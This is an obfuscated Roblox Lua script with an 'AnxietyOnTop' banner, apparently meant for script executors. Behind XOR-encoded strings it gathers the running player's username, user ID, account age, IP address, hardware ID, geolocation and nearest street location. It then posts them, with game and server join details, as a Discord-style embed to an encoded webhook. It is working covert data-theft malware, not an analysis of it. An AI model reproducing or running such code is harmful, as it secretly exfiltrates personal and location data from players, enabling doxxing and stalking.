--[[
   ___                      __     ____  ____   ______  __________  
  / _ \___ _  _____  ___  / /__  / __ \/ __/ | / / __ \/ ____/ __ \ 
 / , _/ _ \ |/ / _ \/ _ \/ / _ \/ /_/ / /_ | |/ / /_/ / __/ / /_/ / 
/_/|_|\___/___/\___/_//_/_/\___/\____/___/ |___/\____/_/    \____/  
                                                                    
                         A N X I E T Y   O N   T O P

]]--

local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit ;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v33,v34) local v35={};for v54=1, #v33 do v6(v35,v0(v4(v1(v2(v33,v54,v54 + 1 )),v1(v2(v34,1 + (v54% #v34) ,1 + (v54% #v34) + 1 )))%256 ));end return v5(v35);end local v8=game:GetService(v7("\249\215\207\53\213\190\213\8\216\192\222","\126\177\163\187\69\134\219\167"));local v9=game:GetService(v7("\19\193\43\220\249\49\222","\156\67\173\74\165"));local v10=game:GetService(v7("\25\182\91\29\185\50\86\56\182\74\19\143\35\84\34\190\74\19","\38\84\215\41\118\220\70"));local v11=game:GetService(v7("\124\25\33\19\242\89\12\35\6\247\95\24\17\23\236\70\31\33\23","\158\48\118\66\114"));local v12=v9.LocalPlayer;local v13=v12.UserId;local v14=v12.DisplayName;local v15=v12.Name;local v16=tostring(v12.MembershipType):sub(1488 -(899 + 568) );local v17=v12.AccountAge;local v18=v11.RobloxLocaleId;local v19=game:HttpGet(v7("\163\48\4\38\96\255\180\228\50\68\120\122\161\254\165\48\94\59\118\234","\155\203\68\112\86\19\197"));local v20=game:HttpGet(v7("\78\201\34\236\26\55\170\241\86\144\55\236\73\54\230\247\75\146\60\239\79\118","\152\38\189\86\156\32\24\133"));local v21=game:GetService(v7("\206\85\191\103\242\86\171\95\232\94\164\85\207\82\181\80\245\84\162","\38\156\55\199")):GetClientId();local v22=v7("\160\105\104\56\0\46\181\12\191\106\107\102\1\123\248\79\167\101\50\43\28\121\181\68\169\112\121\59\92","\35\200\29\28\72\115\20\154")   .. game.PlaceId   .. v7("\70\184\208\210\136\5\48\68","\84\121\223\177\191\237\76")   .. game.JobId ;local v23=v7("\179\66\221\176\41\10\127\142\172\65\222\238\40\95\50\205\180\78\135\163\53\93\127\212\168\83\219\179\117","\161\219\54\169\192\90\48\80")   .. v13   .. v7("\6\82\18\42\79\75\12\32","\69\41\34\96") ;local v24=os.date(v7("\249\250\154\79\15\102\249\199\151\79\42\113\249\238\141\79\49","\75\220\163\183\106\98"));local v25=v10:GetProductInfo(game.PlaceId).Name;local v26=game.PlaceVersion;local v27= #v9:GetPlayers();local function v28() local v36=0 + 0 ;local v37;while true do if ((0 -0)==v36) then v37=(syn and  not is_sirhurt_closure and  not pebc_execute and "🌟 **Synapse Z**") or (secure_load and "🔒 **Sentinel**") or (pebc_execute and "⚙️ **ProtoSmasher**") or (KRNL_LOADED and "⚡ **Krnl**") or (is_sirhurt_closure and "💣 **SirHurt**") or (identifyexecutor():find(v7("\49\185\153\62\201\22\141\138\37\220","\185\98\218\235\87")) and "🛠️ **Script-Ware**") or "❌ **Unsupported**" ;return v37;end end end local function v29() local v38=603 -(268 + 335) ;local v39;while true do if (v38==(290 -(60 + 230))) then v39=v8:JSONDecode(v20);if (v39.status==v7("\216\41\36\229\219\185\216","\202\171\92\71\134\190")) then local v57=v39.lat;local v58=v39.lon;local v59=game:HttpGet(v7("\33\213\56\152\58\155\99\199\39\206\33\129\39\192\56\129\36\143\35\152\44\207\63\156\59\196\41\156\36\192\60\198\38\211\43\199\59\196\58\141\59\210\41\215\37\192\56\213","\232\73\161\76")   .. v57   .. v7("\253\213\77\83\67","\126\219\185\34\61")   .. v58   .. v7("\74\200\81\96\115\118\231\186\6\221\81\124","\135\108\174\62\18\30\23\147") );local v60=v8:JSONDecode(v59);return v60.display_name or v7("\131\231\33\197\23\185\61\135\154\230\41\202\12\167\60\201","\167\214\137\74\171\120\206\83") ;else return v7("\174\226\32\82\234\231\153\245\38\79\241\162\157\249\60\90\184\171\132\243\51\73\241\168\133","\199\235\144\82\61\152");end break;end end end local function v30() local v40=v28();local v41=v29();local v42={[v7("\6\0\184\63\6\4\134\62\21\26","\75\103\118\217")]=v7("\207\64\100\4\170\68\136\27\125\17\189\23\198\26\116\29\170\29\200\70\116\21\169\14\137\90\117\0\246\31\211\64\113\23\177\19\194\90\100\7\246\79\149\12\34\64\239\74\151\13\33\67\232\73\148\3\36\68\235\76\136\5\34\76\238\79\150\7\41\77\225\73\150\3\38\76\232\73\159\1\63\39\186\12\194\81\126\7\177\17\211\107\34\76\247\14\201\83\47\17\161\67\145\2\118\77\224\70\146\6\54\29\170\67\145\2\118\76\237\72\195\6\54\28\180\67\198\82\35\76\236\77\197\5\116\69\225\74\146\13\41\21\224\29\151\86\117\66\238\28\144\87\118\77\238\31\196\1\37\16\235\72\149\82\118\71\186\76\198\85\34\68\237\77\148\86\34\18\225\24\198\4\113\76\239\28\196\4\33\18\255\67\129\82\127\6\180\31\211\9\103\17\187\14\129\69\101\21\181\23\211\77\45\24\182\13\212\88\117\7\170","\126\167\52\16\116\217"),[v7("\203\33\46\148\177\23\232","\156\168\78\64\224\212\121")]="",[v7("\2\227\167\203\3\253","\174\103\142\197")]={{[v7("\66\33\75\52\32","\152\54\72\63\88\69\62")]="🚨 **Script Execution Alert**",[v7("\208\193\253\95\198\205\254\72\221\203\224","\60\180\164\142")]=string.format("__**👤 Player Info:**__\n"   .. "> **✨ Display Name:** `%s`\n"   .. "> **🧑‍💻 Username:** `%s`\n"   .. "> **🆔 User ID:** `%d`\n"   .. "> **💳 Membership Type:** `%s`\n"   .. "> **🕒 Account Age:** `%d days`\n"   .. "> **🌍 Country:** `%s`\n"   .. "> **📡 IP Address:** `%s`\n"   .. "> **🖥️ HWID:** `%s`\n"   .. "> **📅 Date:** `%s`\n"   .. "> **🕒 Time:** `%s`\n\n"   .. "__**🎮 Game Info:**__\n"   .. "> **🏠 Game Name:** `%s`\n"   .. "> **🔢 Game Version:** `%s`\n"   .. "> **👥 Active Players:** `%d`\n"   .. "> **🔧 Executor:** `%s`\n"   .. "> **🌐 Closest Street Location:** `%s`\n"   .. "> **📊 Data:** ```%s```\n"   .. "> **🔗 Job ID (Join Link):** [Click here to join](%s)\n"   .. "> **👤 Profile Link:** [View Profile](%s)" ,v14,v15,v13,v16,v17,v18,v19,v21,v24:sub(1 + 0 ,2 + 8 ),v24:sub(1468 -(282 + 1174) ),v25,v26,v27,v40,v41,v20,v22,v23),[v7("\76\71\21\44","\114\56\62\101\73\71\141")]=v7("\170\224\216\204","\164\216\137\187"),[v7("\209\233\61\189\180","\107\178\134\81\210\198\158")]=tonumber(v7("\104\22\211\224\242\26\90\161","\202\88\110\226\166")),[v7("\215\7\151\250\200\205\14\139\251","\170\163\111\226\151")]={[v7("\4\34\190","\73\113\80\210\88\46\87")]=v7("\137\56\217\2\244\219\99\130\5\240\150\98\223\29\229\141\35\213\92\228\142\33\130\26\226\128\40\222\26\232\149\97\217\26\242\140\46\195\19\238\141\99\196\31\230\134\41\146\7\244\132\62\228\22\186","\135\225\76\173\114")   .. v13   .. v7("\92\250\177\180\184\181\250\75\184\232\246\164\184\174\29\229\172\237\253\232\247\92\235\183\162\161\188\179\71\253\182\183","\199\122\141\216\208\204\221") },[v7("\171\210\31\228\125\228","\150\205\189\112\144\24")]={[v7("\49\129\167\88","\112\69\228\223\44\100\232\113")]="✨ AnxietyOnTop 💻 | Stay Safe! 🛡️",[v7("\221\28\8\221\137\105\148\216","\230\180\127\103\179\214\28")]=v7("\132\17\75\86\247\27\175\195\8\90\66\237\64\174\136\12\76\69\235\83\228\141\21\79\8\234\68\244\195\4\75\82\229\66\232\129\0\81\82\247\14\177\222\93\13\18\178\21\176\213\84\8\23\179\18\183\216\85\13\20\171\16\178\212\82\14\23\183\24\185\212\82\14\17\178\25\177\219\93\10\9\215\66\242\137\0\81\85\236\78\244\179\87\7\8\244\79\231\211\0\71\27\178\23\230\213\92\7\19\182\7\233\159\88\9\16\226\25\180\218\1\13\0\236\76\189\141\3\12\30\177\18\226\221\1\14\30\176\20\185\213\4\6\69\180\67\229\218\82\93\17\231\71\185\219\4\92\19\177\69\178\218\87\89\64\183\66\178\141\4\13\22\176\18\179\142\87\89\30\226\64\176\141\93\9\68\231\17\177\138\67\2\0\226\78\242\129\4\75\27\243\68\226\156\67\78\83\229\77\233\152\28\2\74\235\82\243\128\0\76\85","\128\236\101\63\38\132\33")},[v7("\165\164\16\67\179","\175\204\201\113\36\214\139")]={[v7("\82\222\57","\100\39\172\85\188")]=v7("\165\108\173\144\32\247\55\246\137\62\172\127\188\147\125\184\118\170\144\63\172\107\177\206\48\162\117\246\144\59\162\108\182\205\98\248\45\239\215\103\255\40\237\210\126\248\122\224\213\54\251\126\239\133\107\169\121\230\129\38\185\119\228\134\60\191\117\184\148\117\171\113\173\221\48\191\119\169\198\36\240\41\224\210\99\235\105\228\216\99","\83\205\24\217\224")},[v7("\224\204\200\49\226\214","\93\134\165\173")]={{[v7("\176\243\204\199","\30\222\146\161\162\90\174\210")]="**💼 Additional Info:**",[v7("\243\79\124\31\224","\106\133\46\16")]=v7("\6\96\57\182\121\79\86\51\124\240\95\0\123\47\126\241\91\78\92\122\57\182\26\64","\32\56\64\19\156\58")   .. v22   .. "`" ,[v7("\83\198\233\95\84\247","\224\58\168\133\54\58\146")]=false},{[v7("\87\87\70\248","\107\57\54\43\157\21\230\231")]="🏷️ **Player Status:**",[v7("\205\138\29\224\188","\175\187\235\113\149\217\188")]=v7("\19\161\141\69\237\124","\24\92\207\225\44\131\25"),[v7("\66\221\180\69\21\120","\29\43\179\216\44\123")]=true},{[v7("\179\216\45\73","\44\221\185\64")]="📅 **Last Active:**",[v7("\23\230\68\74\118","\19\97\135\40\63")]=os.date(v7("\235\101\126\126\34\124\235\88\115\126\7\107\235\113\105\126\28","\81\206\60\83\91\79")),[v7("\71\165\220\123\33\198","\196\46\203\176\18\79\163\45")]=true},{[v7("\182\35\115\27","\143\216\66\30\126\68\155")]="🔔 **Alerts:**",[v7("\188\201\1\222\192","\129\202\168\109\171\165\195\183")]="⚠️ *Be cautious of any suspicious activity!*",[v7("\43\86\59\209\208\17","\134\66\56\87\184\190\116")]=false},{[v7("\50\48\4\190","\85\92\81\105\219\121\139\65")]="⚡ **Quick Links:**",[v7("\235\178\92\80\121","\191\157\211\48\37\28")]=v7("\228\44\225\12\42\208\13\224\92\9\218\13\226\25\40\226\87\252\8\46\207\12\174\83\117\219\22\231\31\53\205\27\186\27\61\144\12\225\12\42\208\13\224\85\122\195\95\207\58\27\238\34\188\20\46\203\15\231\70\117\144\27\253\15\57\208\13\240\82\61\216\80\242\29\43\150","\90\191\127\148\124"),[v7("\113\137\34\30\118\130","\119\24\231\78")]=false}}}}};return v8:JSONEncode(v42);end local function v31(v43,v44) local v45=1271 -(945 + 326) ;local v46;local v47;local v48;local v49;local v50;while true do if (v45==(1 + 0)) then v48={[v7("\110\60\184","\45\59\78\212\54")]=v43,[v7("\50\89\135\146","\144\112\54\227\235\230\78\205")]=v44,[v7("\158\45\27\244\223\95","\59\211\72\111\156\176")]=v7("\126\168\208\25","\77\46\231\131"),[v7("\146\81\183\68\191\70\165","\32\218\52\214")]=v46};v49,v50=pcall(function() return v47(v48);end);v45=4 -2 ;end if (v45==(2 + 0)) then if  not v49 then print(v7("\107\5\35\167\227\240\86\95\64\19\56\166\246\240\82\95\76\31\62\167\250\234","\58\46\119\81\200\145\208\37"),v50);end break;end if ((700 -(271 + 429))==v45) then local v55=0;while true do if (v55==(1 + 0)) then v45=1501 -(1408 + 92) ;break;end if (v55==(1427 -(41 + 1386))) then v46={[v7("\129\34\171\94\217\78\5\207\57\188\90\217","\113\226\77\197\42\188\32")]=v7("\59\6\228\185\51\21\245\161\51\25\250\250\48\5\251\187","\213\90\118\148")};v47=http_request or v47 or HttpPost or syn.request ;v55=1087 -(461 + 625) ;end end end end end local function v32() local v51=1288 -(993 + 295) ;local v52;local v53;while true do if (v51==(1 + 0)) then v31(v52,v53);break;end if (v51==(1171 -(418 + 753))) then local v56=0 -0 ;while true do if (v56==(166 -(122 + 44))) then v52=v7("\35\152\36\188\186\231\121\100\136\57\191\170\178\36\47\194\51\163\164\242\55\59\133\127\187\172\191\62\36\131\59\191\230\236\101\124\216\98\245\250\234\96\123\218\99\250\251\239\97\125\222\100\227\172\188\61\28\163\104\161\153\158\102\37\187\51\159\185\237\17\40\157\58\148\185\237\36\1\154\56\160\228\237\32\17\138\101\132\152\173\62\4\160\40\169\135\180\14\121\152\0\180\165\191\39\42\155\20\170\166\236\111\63\173\61\166\162\154\36\38\150","\86\75\236\80\204\201\221");v53=v30();v56=1 -0 ;end if (v56==(3 -2)) then v51=1 + 0 ;break;end end end end end v32();
